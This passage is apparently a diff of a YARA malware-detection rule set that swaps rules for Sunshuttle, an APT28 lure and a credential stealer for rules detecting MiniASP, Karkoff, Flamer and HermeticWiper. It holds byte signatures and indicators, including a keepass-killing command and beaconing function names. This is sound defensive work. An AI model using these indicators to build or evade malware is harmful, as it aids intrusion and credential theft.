-		hash3 = "26fbdd516b3c1bfa36784ef35d6bc216baeb0ef2d0c0ba036ff9296da2ce2c84"
 
 	strings:
-		$sq1 = { 55 8B EC 56 8B 75 08 57 56 E8 ?? ?? ?? ?? 8B F8 59 85 FF 75 04 33 C0 EB 20 56 6A 00 57 E8 ?? ?? ?? ?? 6A 0C E8 ?? ?? ?? ?? 83 C4 10 85 C0 74 E5 83 60 08 00 89 38 89 70 04 5F 5E 5D C3 }
-		$sq2 = { 55 8B EC 83 EC 0C 53 56 57 33 DB BE ?? ?? ?? ?? 53 53 56 6A 09 E8 ?? ?? ?? ?? 6A 10 6A 01 53 53 8D 4D F8 51 FF D0 53 53 56 6A 09 E8 ?? ?? ?? ?? 6A 08 6A 01 53 53 8D 4D F8 51 FF D0 85 C0 0F 84 2B 01 00 00 6A 24 E8 ?? ?? ?? ?? 59 8B D8 33 C0 6A 09 59 8B FB F3 AB 66 8B 4D 24 B8 03 66 00 00 C7 03 08 02 00 00 66 85 C9 74 03 0F B7 C1 8B 4D 08 33 D2 0F B7 C0 89 43 04 89 53 08 85 C9 74 12 C7 43 08 08 00 00 00 8B 01 89 43 0C 8B 41 04 89 43 10 8B 4D 0C 85 C9 74 0F 83 43 08 08 8B 01 89 43 14 8B 41 04 89 43 18 8B 4D 10 85 C9 74 0F 83 43 08 08 8B 01 89 43 1C 8B 41 04 89 43 20 8B 7B 08 8B 75 F8 83 C7 0C 52 52 68 ?? ?? ?? ?? 6A 09 E8 ?? ?? ?? ?? 8D 4D FC 51 6A 00 6A 00 57 53 56 FF D0 85 C0 74 75 8B 75 FC 33 C0 40 83 7D 20 00 0F 45 45 20 33 FF 57 57 68 ?? ?? ?? ?? 6A 09 89 45 F4 E8 ?? ?? ?? ?? 57 8D 4D F4 51 6A 04 56 FF D0 85 C0 74 3B 39 7D 14 74 1A 8B 75 FC 57 57 68 ?? ?? ?? ?? 6A 09 E8 ?? ?? ?? ?? 57 FF 75 14 6A 01 56 FF D0 8B 55 18 8B 4D FC 53 89 0A 8B 55 1C 8B 4D F8 89 0A E8 ?? ?? ?? ?? 33 C0 59 40 EB 21 FF 75 FC E8 BF FB FF FF 59 EB 02 33 FF 53 E8 ?? ?? ?? ?? 57 FF 75 F8 E8 6B FB FF FF 83 C4 0C 33 C0 5F 5E 5B 8B E5 5D C3 }
-		$sq3 = { 55 8B EC 83 EC 0C 53 8B 5D 0C 56 57 6A 10 33 F6 89 75 F8 89 75 FC 58 89 45 F4 85 DB 75 0E FF 75 08 E8 ?? ?? ?? ?? 8B D8 8B 45 F4 59 50 E8 ?? ?? ?? ?? 8B F8 59 85 FF 0F 84 B6 00 00 00 FF 75 F4 56 57 E8 C4 ?? ?? ?? 83 C4 0C 56 56 68 ?? ?? ?? ?? 6A 09 E8 ?? ?? ?? ?? 68 00 00 00 F0 6A 01 56 56 8D 4D F8 51 FF D0 85 C0 0F 84 84 00 00 00 8B 75 F8 6A 00 6A 00 68 ?? ?? ?? ?? 6A 09 E8 ?? ?? ?? ?? 8D 4D FC 51 6A 00 6A 00 68 03 80 00 00 56 FF D0 85 C0 74 51 6A 00 53 FF 75 08 FF 75 FC E8 7F FD FF FF 83 C4 10 85 C0 74 3C 8B 75 FC 6A 00 6A 00 68 ?? ?? ?? ?? 6A 09 E8 ?? ?? ?? ?? 6A 00 8D 4D F4 51 57 6A 02 56 FF D0 85 C0 74 19 FF 75 FC E8 16 FD FF FF 6A 00 FF 75 F8 E8 26 FD FF FF 83 C4 0C 8B C7 EB 0E 6A 00 FF 75 F8 E8 15 FD FF FF 59 59 33 C0 5F 5E 5B 8B E5 5D C3 }
-		$sq4 = { 55 8B EC 83 7D 10 00 56 57 8B 7D 0C 57 74 0E E8 ?? ?? ?? ?? 8B F0 33 C0 03 F6 40 EB 09 E8 ?? ?? ?? ?? 8B F0 33 C0 83 7D 14 00 59 75 24 50 FF 75 08 E8 2C 00 00 00 59 59 83 F8 01 74 04 33 C0 EB 1D 56 FF 75 08 E8 C5 FE FF FF 59 59 83 F8 01 75 EC 56 57 FF 75 08 E8 CA FE FF FF 83 C4 0C 5F 5E 5D C3 }
-		$sq5 = { 55 8B EC 53 56 8B 75 0C 57 85 F6 75 0B FF 75 08 E8 ?? ?? ?? ?? 59 8B F0 6B C6 03 89 45 0C 8D 58 01 53 E8 ?? ?? ?? ?? 8B F8 59 85 FF 74 42 53 6A 00 57 E8 ?? ?? ?? ?? 83 C4 0C 33 D2 85 F6 74 27 8B 45 08 0F B6 0C 02 8B C1 83 E1 0F C1 E8 04 8A 80 ?? ?? ?? ?? 88 04 57 8A 81 ?? ?? ?? ?? 88 44 57 01 42 3B D6 72 D9 8B 45 0C C6 04 07 00 8B C7 5F 5E 5B 5D C3 }
-		$sq6 = { 55 8B EC 53 56 57 FF 75 08 E8 ?? ?? ?? ?? 33 C9 6A 02 5B 8D B8 A0 1F 00 00 8B C7 F7 E3 0F 90 C1 F7 D9 0B C8 51 E8 ?? ?? ?? ?? 8B F0 59 59 85 F6 74 6F 8D 0C 3F 51 6A 00 56 E8 ?? ?? ?? ?? 8D 45 0C 50 FF 75 08 56 E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 8B F8 83 C4 1C 85 FF 74 40 33 C9 8D 47 02 F7 E3 0F 90 C1 F7 D9 0B C8 51 E8 ?? ?? ?? ?? 8B D8 59 85 DB 74 25 8D 0C 7D 02 00 00 00 51 6A 00 53 E8 ?? ?? ?? ?? 57 56 53 E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 1C 8B C3 EB 09 56 E8 ?? ?? ?? ?? 59 33 C0 5F 5E 5B 5D C3 }
-		$sq7 = { 55 8B EC 81 EC 80 00 00 00 56 57 E8 ?? ?? ?? ?? 6A 1F 59 BE ?? ?? ?? ?? 8D 7D 80 F3 A5 33 C9 6A 02 5A 66 A5 8B 7D 08 8D 47 01 F7 E2 0F 90 C1 F7 D9 0B C8 51 E8 ?? ?? ?? ?? 8B F0 59 85 F6 74 4D 8D 04 7D 02 00 00 00 4F 89 45 08 53 50 6A 00 56 E8 ?? ?? ?? ?? 83 C4 0C 33 DB 85 FF 74 1C E8 ?? ?? ?? ?? 33 D2 6A 7E 59 F7 F1 D1 EA 66 8B 44 55 80 66 89 04 5E 43 3B DF 72 E4 56 E8 ?? ?? ?? ?? 3B F8 8B 45 08 59 77 C4 8B C6 5B EB 02 33 C0 5F 5E 8B E5 5D C3 }
-		$sq8 = { 55 8B EC 81 EC 50 02 00 00 53 56 57 6A 0A E8 ?? ?? ?? ?? 59 33 DB 6A 2E 5E 39 5D 14 0F 84 13 01 00 00 FF 75 08 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 59 59 85 F6 0F 84 F7 00 00 00 53 53 68 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 8D 8D B0 FD FF FF 51 56 FF D0 8B D8 83 FB FF 0F 84 CC 00 00 00 F6 85 B0 FD FF FF 10 0F 84 97 00 00 00 83 7D 1C 00 74 2E 8D 85 DC FD FF FF 68 ?? ?? ?? ?? 50 E8 0A ?? ?? ?? 59 59 85 C0 75 7A 8D 85 DC FD FF FF 68 ?? ?? ?? ?? 50 E8 F3 ?? ?? ?? 59 59 85 C0 75 63 8D 85 DC FD FF FF 50 E8 ?? ?? ?? ?? 59 83 F8 03 73 0C 6A 2E 58 66 39 85 DC FD FF FF 74 45 8D 85 DC FD FF FF 50 FF 75 08 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 0C 89 45 14 85 C0 74 27 6A 01 6A 00 6A 01 FF 75 10 FF 75 0C 50 E8 14 FF FF FF FF 75 14 8B F8 E8 ?? ?? ?? ?? 83 C4 1C 85 FF 0F 85 EE 00 00 00 33 C0 50 50 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 8D B0 FD FF FF 51 53 FF D0 85 C0 0F 85 3B FF FF FF 53 E8 ?? ?? ?? ?? 59 56 E8 ?? ?? ?? ?? 59 33 DB 6A 2E 5E FF 75 0C FF 75 08 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 83 C4 0C 85 FF 0F 84 CF 00 00 00 53 53 68 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 8D 8D B0 FD FF FF 51 57 FF D0 8B D8 83 FB FF 0F 84 A6 00 00 00 8D 85 DC FD FF FF 50 E8 ?? ?? ?? ?? 59 83 F8 03 73 09 66 39 B5 DC FD FF FF 74 3E 83 BD B0 FD FF FF 10 75 06 83 7D 18 00 74 2F 8D 85 DC FD FF FF 50 FF 75 08 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 83 C4 0C 85 F6 74 12 83 7D 10 00 74 40 56 FF 55 10 56 E8 ?? ?? ?? ?? 59 59 33 C0 50 50 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 8D B0 FD FF FF 51 53 FF D0 85 C0 74 29 6A 2E 5E EB 85 56 E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 59 59 8B C7 EB 22 57 E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 59 59 8B C6 EB 10 53 E8 ?? ?? ?? ?? 59 57 E8 ?? ?? ?? ?? 59 33 C0 5F 5E 5B 8B E5 5D C3 }
-		$sq9 = { 83 3D 14 ?? ?? ?? ?? 56 74 0A 8B 35 20 ?? ?? ?? 85 F6 75 66 53 57 BB E0 01 00 00 33 FF 53 89 3D 14 ?? ?? ?? E8 F0 F8 FF FF 33 F6 A3 14 ?? ?? ?? 46 59 85 C0 74 12 6A 78 57 50 89 35 20 ?? ?? ?? E8 A6 F8 FF FF 83 C4 0C 53 89 3D 18 ?? ?? ?? E8 C5 F8 FF FF A3 18 ?? ?? ?? 59 85 C0 74 14 6A 78 57 50 89 35 20 ?? ?? ?? E8 7E F8 FF FF 83 C4 0C EB 06 8B 35 20 ?? ?? ?? 5F 5B 8B C6 5E C3 }
-		$sq10 = { 55 8B EC 51 51 83 65 FC 00 53 56 57 64 A1 30 00 00 00 89 45 FC 8B 45 FC 8B 40 0C 8B 58 0C 8B F3 8B 46 18 FF 76 28 89 45 F8 E8 CE FA FF FF 8B F8 59 85 FF 74 1F 6A 00 57 E8 32 01 00 00 57 E8 ?? ?? ?? ?? 03 C0 50 57 E8 71 FA FF FF 83 C4 14 39 45 08 74 11 8B 36 3B DE 75 C6 33 C0 5F 5E 5B 8B E5 5D C2 04 00 8B 45 F8 EB F2 }
-		$sq11 = { A1 ?? ?? ?? ?? 85 C0 74 07 50 E8 ?? ?? ?? ?? 59 A1 ?? ?? ?? ?? 85 C0 74 07 50 E8 ?? ?? ?? ?? 59 A1 ?? ?? ?? ?? 85 C0 74 07 50 E8 ?? ?? ?? ?? 59 33 C0 A3 ?? ?? ?? ?? A3 ?? ?? ?? ?? A3 ?? ?? ?? ?? C3 }
-		$sq12 = { 55 8B EC 56 8B 75 0C 57 85 F6 74 48 56 E8 ?? ?? ?? ?? 59 85 C0 74 3D 56 E8 ?? ?? ?? ?? 59 85 C0 74 32 83 65 0C 00 8D 45 0C 6A 01 50 56 E8 ?? ?? ?? ?? 8B F8 83 C4 0C 85 FF 74 19 8B 45 0C 85 C0 74 12 83 7D 14 00 74 12 39 45 14 73 0D 57 E8 ?? ?? ?? ?? 59 33 C0 5F 5E 5D C3 83 7D 10 00 74 1A 6A 00 6A 01 56 E8 ?? ?? ?? ?? 59 50 FF 75 08 E8 1F 00 00 00 8B 45 0C 83 C4 10 50 57 FF 75 08 E8 FF FE FF FF 57 8B F0 E8 ?? ?? ?? ?? 83 C4 10 8B C6 EB C3 }
-		$sq13 = { 55 8B EC 83 EC 18 56 FF 75 08 E8 ?? ?? ?? ?? 50 89 45 F0 E8 ?? ?? ?? ?? 8B F0 59 59 85 F6 0F 84 C0 00 00 00 53 8B 5D 0C 33 C9 57 6A 04 5A 8B C3 F7 E2 0F 90 C1 F7 D9 0B C8 51 E8 ?? ?? ?? ?? 83 65 F4 00 8B F8 83 65 FC 00 59 85 DB 74 6D 8B 45 10 83 C0 FC FF 75 F0 83 C0 04 89 45 E8 6A 00 56 8B 00 89 45 EC E8 ?? ?? ?? ?? FF 75 F0 FF 75 08 56 E8 ?? ?? ?? ?? 83 65 F8 00 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 20 EB 1F FF 75 EC 50 E8 ?? ?? ?? ?? 59 59 85 C0 75 32 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? FF 45 F8 59 59 85 C0 75 DD 8B 45 FC 40 89 45 FC 3B C3 8B 45 E8 72 99 56 E8 ?? ?? ?? ?? 59 39 5D F4 75 12 8B C7 EB 17 8B 45 FC 8B 4D F8 FF 45 F4 89 0C 87 EB D7 57 E8 ?? ?? ?? ?? 59 33 C0 5F 5B 5E 8B E5 5D C3 }
-		$sq14 = { 55 8B EC 8B 45 0C 53 56 8B 75 08 57 8B 4E 04 03 C1 8D 3C 09 3B F8 77 06 8D B8 F4 01 00 00 33 C9 8B C7 6A 04 5A F7 E2 0F 90 C1 F7 D9 0B C8 51 E8 ?? ?? ?? ?? 8B D8 59 85 DB 74 26 57 6A 00 53 E8 ?? ?? ?? ?? FF 76 08 FF 36 53 E8 ?? ?? ?? ?? FF 36 E8 ?? ?? ?? ?? 33 C0 89 1E 83 C4 1C 89 7E 04 40 5F 5E 5B 5D C3 }
-		$sq15 = { 55 8B EC 83 7D 0C 00 57 74 39 8B 7D 10 85 FF 74 32 56 8B 75 08 8B 46 08 03 C7 3B 46 04 76 09 57 56 E8 3F FF FF FF 59 59 8B 46 08 03 06 57 FF 75 0C 50 E8 ?? ?? ?? ?? 01 7E 08 83 C4 0C 33 C0 40 5E EB 02 33 C0 5F 5D C3 }
+		$byte = { C0 0E 5B C3 }
+		$s1 = "Encrypted file:  CRC failed in %s (password incorrect ?)" fullword wide
+		$s2 = "EBorland C++ - Copyright 1999 Inprise Corporation" fullword ascii
+		$s3 = " MacOS file type:  %c%c%c%c  ; " fullword wide
+		$s4 = "rar.lng" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 900KB and all of them
 }
-rule TRELLIX_ARC_STEALER_Emirates_Statement : STEALER
+rule TRELLIX_ARC_Apt_Miniasp_Pdb : TROJAN FILE
 {
 	meta:
-		description = "Credentials Stealing Attack"
-		author = "Christiaan Beek | McAfee ATR Team"
-		id = "b5a6d996-8a3d-5238-95af-bf5ff893bbc5"
-		date = "2013-06-30"
+		description = "Rule to detect MiniASP based on PDB"
+		author = "Marc Rivero | McAfee ATR Team"
+		id = "2e7e2990-5e7f-52b0-884a-fcb54b2f5488"
+		date = "2012-07-12"
 		modified = "2020-08-14"
-		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/stealer/STEALER_EmiratesStatement.yar#L1-L24"
+		reference = "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_MiniASP_pdb.yar#L1-L26"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "7cf757e0943b0a6598795156c156cb90feb7d87d4a22c01044499c4e1619ac57"
-		logic_hash = "17eaddf375fc1875fb0275f8c0f93dfe921b452bdc6eb471adc155f749492328"
+		hash = "42334f2119069b8c0ececfb14a7030e480b5d18ca1cc35f1ceaee847bc040e53"
+		logic_hash = "8ee6f93aaae2c48cc5835269fd526371040cd33cc309220f92a150444ba21055"
 		score = 75
-		quality = 45
-		tags = "STEALER"
+		quality = 70
+		tags = "TROJAN, FILE"
 		rule_version = "v1"
-		malware_type = "stealer"
-		malware_family = "Stealer:W32/DarkSide"
-		actor_type = "Cybercrime"
+		malware_type = "trojan"
+		malware_family = "Trojan:W32/MiniASP"
+		actor_type = "Apt"
 		actor_group = "Unknown"
 
 	strings:
-		$string0 = "msn.klm"
-		$string1 = "wmsn.klm"
-		$string2 = "bms.klm"
+		$pdb = "\\Project\\mm\\Wininet\\Attack\\MiniAsp4\\Release\\MiniAsp.pdb"
+		$pdb1 = "\\XiaoME\\AiH\\20120410\\Attack\\MiniAsp3\\Release\\MiniAsp.pdb"
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 80KB and any of them
 }
-/*
- * YARA Rule Set
- * Repository Name: Arkbird SOLG
- * Repository: https://github.com/StrangerealIntel/DailyIOC
- * Retrieval Date: 2025-06-08
- * Git Commit: a873ff1298c43705e9c67286f3014f4300dd04f7
- * Number of Rules: 215
- * Skipped: 0 (age), 11 (quality), 0 (score), 0 (importance)
- *
- *
- * LICENSE
- *
- * NO LICENSE SET
- */
-rule ARKBIRD_SOLG_APT_UNC2452_Sunshuttle_Mar_2021_1 : FILE
+rule TRELLIX_ARC_Karkoff_Dnspionaje : BACKDOOR FILE
 {
 	meta:
-		description = "Detect Sunshuttle implant used by UNC2452 group"
-		author = "Arkbird_SOLG"
-		id = "faa07d19-4c61-554d-a6b1-ab7cb0919ec0"
-		date = "2021-03-06"
-		modified = "2021-03-06"
-		reference = "https://twitter.com/Arkbird_SOLG/status/1367570764468224010"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-03-06/UNC2452/APT_UNC2452_sunshuttle_Mar_2021_1.yar#L1-L31"
-		license_url = "N/A"
-		logic_hash = "368487f1716aaa5c10e19a428649d6706b3f45c53853e6729752dc41fc97bc38"
+		description = "Rule to detect the Karkoff malware"
+		author = "Marc Rivero | McAfee ATR Team"
+		id = "a5cdc65f-3a4c-5d97-9d88-8d60b14dfb9a"
+		date = "2019-04-23"
+		modified = "2020-08-14"
+		reference = "https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_karkoff_dnspionaje.yar#L1-L30"
+		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
+		hash = "5b102bf4d997688268bab45336cead7cdf188eb0d6355764e53b4f62e1cdf30c"
+		logic_hash = "79dd0087f1197cb1b2cd98416302363951479ba5ebf82289768585b56ed21c3a"
 		score = 75
-		quality = 63
-		tags = "FILE"
-		hash1 = "611458206837560511cb007ab5eeb57047025c2edc0643184561a6bf451e8c2c"
-		hash2 = "b9a2c986b6ad1eb4cfb0303baede906936fe96396f3cf490b0984a4798d741d8"
-		hash3 = "bbd16685917b9b35c7480d5711193c1cd0e4e7ccb0f2bf1fd584c0aebca5ae4c"
+		quality = 70
+		tags = "BACKDOOR, FILE"
+		rule_version = "v1"
+		malware_type = "backdoor"
+		malware_family = "Backdoor:W32/Karkoff"
+		actor_type = "Apt"
+		actor_group = "Unknown"
 
 	strings:
-		$s1 = { 47 6f 20 62 75 69 6c 64 20 49 44 3a 20 22 39 59 72 42 6a 6b 6b 58 46 79 6b 62 47 51 72 6d 56 32 4b 49 2f 41 48 44 69 7a 57 51 61 4d 38 47 38 4a 37 6b 56 4b 32 56 65 2f 46 55 74 5f 6b 6b 53 56 6c 78 32 36 49 6e 46 56 61 79 70 77 2f 6c 75 5a 41 54 35 55 6e 55 69 34 64 4a 65 6b 6e 73 6b 55 6e 22 }
-		$s2 = { 47 6f 20 62 75 69 6c 64 20 49 44 3a 20 22 71 6f 66 49 6b 76 62 6c 73 31 69 72 4f 36 78 68 6a 41 63 5a 2f 6a 49 69 71 41 70 70 31 56 6f 39 72 4f 53 2d 44 6a 65 4e 75 2f 62 50 75 6e 33 4e 35 74 49 42 58 4b 50 74 4e 79 73 48 4f 51 2f 41 52 53 72 63 65 6b 35 68 51 47 38 59 49 56 6e 4d 75 37 54 22 }
-		$s3 = { 6f 73 2f 65 78 65 63 2e 28 2a 43 6d 64 29 2e 52 75 6e }
-		$s4 = "main.request_session_key" fullword ascii
-		$s5 = "main.wget_file" fullword ascii
-		$s6 = "main.GetMD5Hash" fullword ascii
-		$s7 = "main.beaconing" fullword ascii
-		$s8 = "main.resolve_command" fullword ascii
-		$s9 = "main.send_file_part" fullword ascii
-		$s10 = "main.retrieve_session_key" fullword ascii
-		$s11 = "main.send_command_result" fullword ascii
-		$s12 = { 63 38 3a 32 37 3a 63 63 3a 63 32 3a 33 37 3a 35 61 }
-		$s13 = { 2d 2d 2d 2d 2d 42 45 47 49 4e }
-		$s14 = { 2d 2d 2d 2d 2d 45 4e 44 }
+		$s1 = "DropperBackdoor.Newtonsoft.Json.dll" fullword wide
+		$s2 = "C:\\Windows\\Temp\\MSEx_log.txt" fullword wide
+		$s3 = "DropperBackdoor.exe" fullword wide
+		$s4 = "get_ProcessExtensionDataNames" fullword ascii
+		$s5 = "get_ProcessDictionaryKeys" fullword ascii
+		$s6 = "https://www.newtonsoft.com/json 0" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 800KB and 12 of them
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them
 }
-rule ARKBIRD_SOLG_APT_Unknown_Middle_East_Feb_2020_1 : FILE
+rule TRELLIX_ARC_Apt_Flamer_Pdb : BACKDOOR FILE
 {
 	meta:
-		description = "Dectect unknown Middle East implants (retrohunt June 2020)"
-		author = "Arkbird_SOLG"
-		id = "e45675e6-29d5-587b-943e-19450772a092"
-		date = "2021-03-05"
-		modified = "2021-03-06"
-		reference = "internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-03-06/Unknown/APT_Unknown_Middle_East_Feb_2020_1.yar#L1-L24"
-		license_url = "N/A"
-		logic_hash = "64cdac73bc3e29e8716cb24ae6577f853b2cf31303d129a0ec38ba89b7ff5351"
+		description = "Rule to detect Flamer based on the PDB"
+		author = "Marc Rivero | McAfee ATR Team"
+		id = "3bbe043d-c0dc-5aa2-b985-800a6d9038fd"
+		date = "2012-05-29"
+		modified = "2020-08-14"
+		reference = "https://www.forcepoint.com/ko/blog/x-labs/flameflamerskywiper-one-most-advanced-malware-found-yet"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/flamer_pdb.yar#L1-L25"
+		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
+		hash = "554924ebdde8e68cb8d367b8e9a016c5908640954ec9fb936ece07ac4c5e1b75"
+		logic_hash = "3c1d3d015e086cff1f3d5add39397d8ed251b12144b31d8547165cbd0217735c"
 		score = 75
-		quality = 75
-		tags = "FILE"
-		hash1 = "274beb57ae19cbc5c2027e08cb2b718dea7ed1acb21bd329d5aba33231fb699d"
-		hash2 = "3a4ef9b7bd7f61c75501262e8b9e31f9e9bc3a841d5de33dcdeb8aaa65e95f76"
+		quality = 70
+		tags = "BACKDOOR, FILE"
+		rule_version = "v1"
+		malware_type = "backdoor"
+		malware_family = "Backdoor:W32/Flamer"
+		actor_type = "Apt"
+		actor_group = "Unknown"
 
 	strings:
-		$seq1 = { 55 8b ec 83 e4 f8 81 ec 08 04 00 00 a1 34 45 49 00 33 c4 89 84 24 04 04 00 00 83 ec 08 ba [2] 48 00 b9 ?? 82 48 00 68 [2] 48 00 e8 af 9f ff ff 83 c4 04 ba [2] 48 00 b9 ?? 82 48 00 68 [2] 48 00 e8 98 9f ff ff 83 c4 04 ba [2] 48 00 b9 ?? 82 48 00 68 [2] 48 00 e8 81 9f ff ff 83 c4 0c 8d 04 24 68 00 04 00 00 6a 00 50 e8 [2] 01 00 83 c4 0c 8d 04 24 [4] 00 68 00 02 00 00 50 e8 [2] 02 00 83 c4 0c 8d 04 24 68 ?? ab 49 00 68 00 02 00 00 50 e8 [2] 02 00 83 c4 0c 8d 04 24 68 ?? 6c 48 00 68 00 02 00 00 50 e8 [2] 02 00 83 c4 0c 8d 04 24 68 ?? a9 49 00 68 00 02 00 00 50 e8 [2] 02 00 83 c4 0c 8d 04 24 68 ?? 83 48 00 68 00 02 00 00 50 e8 [2] 02 00 83 c4 0c 33 c0 66 89 84 24 fe 03 00 00 8d 04 24 68 [2] 48 00 68 00 02 00 00 50 e8 [2] 02 00 83 c4 0c 8d 04 24 68 ?? a6 49 00 68 00 02 00 00 50 e8 [2] 02 00 83 c4 0c 8d 04 24 68 ?? 83 48 00 68 00 02 00 00 50 e8 [2] 02 00 8d 4c 24 0c e8 6b a1 ff ff 83 c4 04 ba [2] 48 00 b9 ?? 83 48 00 68 [2] 48 00 e8 94 9e ff ff 8b 8c 24 10 04 00 00 83 c4 0c 33 cc e8 [2] 01 00 8b e5 5d }
-		$seq2 = { 55 8b ec 6a ff 68 [2] 47 00 64 a1 00 00 00 00 50 81 ec d8 00 00 00 a1 34 45 49 00 33 c5 89 45 f0 56 57 50 8d 45 f4 64 a3 00 00 00 00 8b 45 08 8b 75 14 c7 45 fc 00 00 00 00 89 85 34 ff ff ff 89 85 40 ff ff ff 33 c0 50 50 50 50 c7 85 3c ff ff ff 00 00 00 00 68 ?? 70 48 00 89 b5 6c ff ff ff c7 85 48 ff ff ff 00 00 00 00 c7 85 44 ff ff ff 00 00 00 00 89 85 50 ff ff ff ff 15 78 55 47 00 89 85 38 ff ff ff 85 c0 74 3f 6a 00 68 bb 01 00 00 68 ?? 6d 48 00 50 ff 15 8c 55 47 00 89 85 44 ff ff ff 85 c0 74 22 68 00 00 80 00 6a 00 6a 00 6a 00 68 ?? 71 48 00 68 ?? 6d 48 00 50 ff 15 90 55 47 00 89 85 50 ff ff ff 8b 3d 44 53 47 00 6a 00 6a 00 6a 00 6a 00 6a ff 56 6a 00 68 e9 fd 00 00 ff d7 8b f0 56 e8 ?? 35 01 00 83 c4 04 89 85 4c ff ff ff 6a 00 6a 00 56 50 6a ff ff b5 6c ff ff ff 6a 00 68 e9 fd 00 00 ff d7 68 80 00 00 00 8b f8 8d 85 70 ff ff ff 6a 00 50 e8 [2] 02 00 57 8d 85 70 ff ff ff 68 ?? 79 48 00 50 e8 ?? a3 00 00 83 c4 18 c7 85 64 ff ff ff 00 00 00 00 33 c0 c7 85 68 ff ff ff 07 00 00 00 8d 8d 54 ff ff ff 66 89 85 54 ff ff ff 6a 10 68 [2] 48 00 e8 ?? 84 00 00 8d 8d 70 ff ff ff c7 45 fc 01 00 00 00 8d 51 02 66 8b 01 83 c1 02 66 85 c0 75 f5 2b ca 8d 85 70 ff ff ff d1 f9 51 50 8d 8d 54 ff ff ff e8 89 63 00 00 6a 33 68 ?? 71 48 00 8d 8d 54 ff ff ff e8 77 63 00 00 8b b5 50 ff ff ff 85 f6 }
-		$s1 = "taskkill /im svehost.exe /t /f" fullword ascii
-		$s2 = "\\AppData\\Windows\\svehost.exe" fullword ascii
-		$s3 = "svehost.exe" fullword wide
-		$s4 = "bdagent.exe" fullword wide
-		$s5 = "taskkill /im keepass.exe /t /f" fullword ascii
-		$s6 = "%s\\AppData\\Windows\\svehost" fullword ascii
-		$s7 = "\\AppData\\Roaming\\ViberPc" fullword wide
-		$s8 = "\\AppData\\Roaming\\Skype" fullword wide
+		$pdb = "\\Projects\\Jimmy\\jimmydll_v2.0\\JimmyForClan\\Jimmy\\bin\\srelease\\jimmydll\\indsvc32.pdb"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 200KB and 1 of ( $seq* ) and 4 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize < 500KB and any of them
 }
-rule ARKBIRD_SOLG_APT_APT28_VHD_Nov_2020_1 : FILE
+rule TRELLIX_ARC_Hermeticwiper : TROJAN FILE
 {
 	meta:
-		description = "Detect suspicious VHD file with APT28 artefacts inside (November 2020)"
-		author = "Arkbird_SOLG"
-		id = "25452eaa-f135-5b7f-a523-67715a2ab9f7"
-		date = "2020-12-09"
-		modified = "2020-12-10"
-		reference = "https://www.intezer.com/blog/research/russian-apt-uses-covid-19-lures-to-deliver-zebrocy/"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-12-09/APT28/APT_APT28_Nov_2020_1.yar#L3-L35"
-		license_url = "N/A"
-		logic_hash = "d72c3428cf731feb63c59ef109b99ec234e69bb6df34bdde928cc4b886f0533b"
-		score = 50
-		quality = 69
-		tags = "FILE"
-		level = "experimental"
-		hash1 = "707b752f6bd89d4f97d08602d0546a56d27acfe00e6d5df2a2cb67c5e2eeee30"
+		description = "Detecting variants of Hermetic Wiper malware discovered in UA"
+		author = " cb @ Trellix ATR"
+		id = "fc6d9238-b732-541d-b083-11b43fe8770d"
+		date = "2022-02-24"
+		modified = "2022-02-24"
+		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_Troj_HermWiper.yar#L1-L27"
+		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
+		logic_hash = "b48e91afa19e09c7035ccda1b9293448e834d612b9a953b593f9412acb78faac"
+		score = 75
+		quality = 70
+		tags = "TROJAN, FILE"
+		rule_version = "v1"
+		malware_type = "Trojan"
 
 	strings:
